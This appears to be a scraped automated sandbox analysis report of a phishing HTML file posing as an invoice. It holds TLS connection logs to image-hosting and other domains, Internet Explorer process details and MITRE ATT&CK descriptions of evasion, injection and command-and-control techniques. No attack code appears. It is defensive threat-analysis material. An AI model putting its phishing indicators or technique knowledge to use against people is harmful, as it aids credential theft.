Jan 13, 2021 18:15:06.471877098 CET	104.20.138.65	443	192.168.2.3	49724	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Aug 03 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Tue Aug 03 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:06.471877098 CET	104.20.138.65	443	192.168.2.3	49724	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:06.473097086 CET	104.20.138.65	443	192.168.2.3	49723	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Aug 03 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Tue Aug 03 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:06.473097086 CET	104.20.138.65	443	192.168.2.3	49723	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:07.403537989 CET	91.207.103.145	443	192.168.2.3	49726	CN=*.uceniciifbi.ro CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Dec 23 21:14:45 CET 2020 Wed Oct 07 21:21:40 CEST 2020	Tue Mar 23 21:14:45 CET 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:07.403537989 CET	91.207.103.145	443	192.168.2.3	49726	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:07.406486988 CET	91.207.103.145	443	192.168.2.3	49725	CN=*.uceniciifbi.ro CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Dec 23 21:14:45 CET 2020 Wed Oct 07 21:21:40 CEST 2020	Tue Mar 23 21:14:45 CET 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:07.406486988 CET	91.207.103.145	443	192.168.2.3	49725	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:07.751676083 CET	104.16.19.94	443	192.168.2.3	49730	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Oct 21 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Thu Oct 21 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:07.751676083 CET	104.16.19.94	443	192.168.2.3	49730	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:07.751749992 CET	104.16.19.94	443	192.168.2.3	49729	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Wed Oct 21 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020	Thu Oct 21 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:07.751749992 CET	104.16.19.94	443	192.168.2.3	49729	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:08.376804113 CET	145.239.131.51	443	192.168.2.3	49735	CN=ibb.co CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Dec 03 13:58:53 CET 2020 Wed Oct 07 21:21:40 CEST 2020	Wed Mar 03 13:58:53 CET 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:08.376804113 CET	145.239.131.51	443	192.168.2.3	49735	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:08.378479004 CET	145.239.131.51	443	192.168.2.3	49736	CN=ibb.co CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Dec 03 13:58:53 CET 2020 Wed Oct 07 21:21:40 CEST 2020	Wed Mar 03 13:58:53 CET 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:08.378479004 CET	145.239.131.51	443	192.168.2.3	49736	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:08.512762070 CET	51.91.224.95	443	192.168.2.3	49737	CN=postimg.cc CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat Nov 14 05:48:16 CET 2020 Thu Mar 17 17:40:46 CET 2016	Fri Feb 12 05:48:16 CET 2021 Wed Mar 17 17:40:46 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Jan 13, 2021 18:15:08.512762070 CET	51.91.224.95	443	192.168.2.3	49737	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: iexplore.exe PID: 3112 Parent PID: 792

General

Start time:	18:15:04
Start date:	13/01/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff6ef7d0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5396 Parent PID: 3112

General

Start time:	18:15:04
Start date:	13/01/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3112 CREDAT:17410 /prefetch:2
Imagebase:	0x250000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report cremocompany-Invoice_216083-xlsx.html

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Dropped Files

Sigma Overview

Signature Overview

Phishing:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: iexplore.exe PID: 3112 Parent PID: 792

General

Chronological Activities

Analysis Process: iexplore.exe PID: 5396 Parent PID: 3112

General

Chronological Activities

Disassembly